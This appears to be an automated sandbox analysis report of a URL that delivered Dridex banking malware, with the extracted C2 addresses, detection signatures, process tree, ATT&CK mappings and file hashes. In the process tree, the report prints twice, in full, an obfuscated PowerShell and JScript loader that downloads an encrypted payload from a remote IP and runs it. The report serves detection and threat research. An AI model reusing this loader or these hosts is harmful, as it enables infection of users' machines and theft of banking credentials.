Analysis

  • max time kernel
    62s
  • max time network
    140s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    17-02-2021 01:46

General

  • Target

    http://traffic.allindelivery.net/

  • Sample

    210217-6y6y4s5q46

Malware Config

Extracted

Family

dridex

Botnet

10111

C2

188.165.17.91:8443

185.216.27.185:8172

182.254.209.230:6516

rc4.plain

Signatures

  • Dridex

    Dridex (also known as Bugat/Cridex) is a form of malware that specializes in stealing banking credentials.

  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • CryptOne packer 2 IoCs

    Detects the CryptOne packer as defined in the NCC blog post.

  • Dridex Loader 2 IoCs

    Detects the Dridex loader, both x86 and x64 builds, in memory.

  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Program crash 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 18 IoCs
  • Suspicious behavior: EnumeratesProcesses 20 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" http://traffic.allindelivery.net/
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1144
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1144 CREDAT:82945 /prefetch:2
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:3552
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe
        ((((\..\PowerShell.exe -Command "<#AAAAAAAAAAAAAAAAAAAAAAAAA ((#>$a = ""Start-Process cmd.exe `"""cmd.exe /q /c cd /d "%tMp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y['set'+'Proxy'](n);y.open('GET',k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/['Wait'+'ForResponse']();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e['cha'+'rCodeAt'](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join('')};try{var u=WScript.Echo(),o='Object',A=Math,a=Function('b','return WScript.Create'+o+'(b)');P=(''+WScript).split(' ')[1],M='indexOf',q=a(P+'ing.FileSystem'+o),m=WScript.Arguments,e='WinHTTP',Z='cmd',Q=a('WinHttp.WinHttpRequest.5.1'),j=a('W'+P+'.Shell'),s=a('ADODB.Stream'),x=O(8)+'.',p='exe',n=0,K=WScript[P+'FullName'],E='.'+p;s.Type=2;s.Charset='iso-8859-1';s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]('PE\x00\x00'));s.WriteText(v);if(31^<d){var z=1;x+='dll'}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x='regsvr'+32+E+' /s '+x);j.run(Z+E+' /c '+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp cvbdfg http://188.227.84.168/?NDg1NTk1^&IPLa^&oa1n4=x3rQcvWYaRyPCYjDM__dSqRGP0vYHliIxY2Y^&s2ht4=n6rVCJ2vfzSj2bCIEBj38V7dSTvSgfdOKa1Ubge-jgeDLgYOmMxZC1lE87etzkWNylafsJSE-UOJNQ5H-5KWQrVo2w_xyLJCdM8kxRWB7WFTmelJUQwT5AlCmP3PEqXIqRR0V0ZjUgvKJ5ojpRTGWSS-NTx3sfS6RDN2nu3K9cd3wZNt0R2v9w^&LaPhnNpVRMTUyNg== "1"`"""""" ; Invoke-Command -ScriptBlock ([Scriptblock]::Create($a))"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1408
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" cmd.exe /q /c cd /d %tMp% && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y['set'+'Proxy'](n);y.open('GET',k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/['Wait'+'ForResponse']();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e['cha'+'rCodeAt'](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join('')};try{var u=WScript.Echo(),o='Object',A=Math,a=Function('b','return WScript.Create'+o+'(b)');P=(''+WScript).split(' ')[1],M='indexOf',q=a(P+'ing.FileSystem'+o),m=WScript.Arguments,e='WinHTTP',Z='cmd',Q=a('WinHttp.WinHttpRequest.5.1'),j=a('W'+P+'.Shell'),s=a('ADODB.Stream'),x=O(8)+'.',p='exe',n=0,K=WScript[P+'FullName'],E='.'+p;s.Type=2;s.Charset='iso-8859-1';s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]('PE\x00\x00'));s.WriteText(v);if(31^<d){var z=1;x+='dll'}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x='regsvr'+32+E+' /s '+x);j.run(Z+E+' /c '+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp cvbdfg http://188.227.84.168/?NDg1NTk1^&IPLa^&oa1n4=x3rQcvWYaRyPCYjDM__dSqRGP0vYHliIxY2Y^&s2ht4=n6rVCJ2vfzSj2bCIEBj38V7dSTvSgfdOKa1Ubge-jgeDLgYOmMxZC1lE87etzkWNylafsJSE-UOJNQ5H-5KWQrVo2w_xyLJCdM8kxRWB7WFTmelJUQwT5AlCmP3PEqXIqRR0V0ZjUgvKJ5ojpRTGWSS-NTx3sfS6RDN2nu3K9cd3wZNt0R2v9w^&LaPhnNpVRMTUyNg== 1
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:376
          • C:\Windows\SysWOW64\wscript.exe
            wsCripT //B //E:JScript 3.tMp cvbdfg http://188.227.84.168/?NDg1NTk1&IPLa&oa1n4=x3rQcvWYaRyPCYjDM__dSqRGP0vYHliIxY2Y&s2ht4=n6rVCJ2vfzSj2bCIEBj38V7dSTvSgfdOKa1Ubge-jgeDLgYOmMxZC1lE87etzkWNylafsJSE-UOJNQ5H-5KWQrVo2w_xyLJCdM8kxRWB7WFTmelJUQwT5AlCmP3PEqXIqRR0V0ZjUgvKJ5ojpRTGWSS-NTx3sfS6RDN2nu3K9cd3wZNt0R2v9w&LaPhnNpVRMTUyNg== 1
            5⤵
            • Blocklisted process makes network request
            • Suspicious use of WriteProcessMemory
            PID:3508
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /c hlzo3.exe
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:3020
              • C:\Users\Admin\AppData\Local\Temp\hlzo3.exe
                hlzo3.exe
                7⤵
                • Executes dropped EXE
                • Checks whether UAC is enabled
                PID:1456
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 3552 -s 2820
        3⤵
        • Suspicious use of NtCreateProcessExOtherParentProcess
        • Program crash
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:720

Network

MITRE ATT&CK Matrix (ATT&CK v6)

  • Defense Evasion
    Modify Registry (1) T1112
  • Discovery
    Query Registry (1) T1012
    System Information Discovery (2) T1082

Downloads

  • C:\Users\Admin\AppData\Local\Temp\3.tMp
    MD5

    88acae3e364010e82fb022c29ab69c9d

    SHA1

    043f08caaf36d317c60977dd9bdaa2be62ed54a0

    SHA256

    f14c7ba0240be3456164dd63f53dd4bc7eb34bcdb1ac26e98a623edc0390b56b

    SHA512

    38283522ffc8d6026c6298b3405f4274c833f3bf36d96648c0030d3aacea1a61553cea20ec0307ab6711e77ca5aadb4a7db308ed942434d5c8cf0733a3a4b27c

  • C:\Users\Admin\AppData\Local\Temp\hlzo3.exe
    MD5

    86954f76b5c0fbb1cb6ea492711869e2

    SHA1

    081e3460fc0c6e6e6cd1b17b4a8f6b949a88db02

    SHA256

    ffd6ae5e716b2cade6d3365fb9440a5a67f37d3c249d78bdea9e5ef3d39ce52c

    SHA512

    4b77cff3caf6966c50bcde7185173ae5c536058e1cd29d05bf439b6021572d856e40af547f22270c7c91bd13aaf3f76941eab9bc298a52724e965067d9825e69
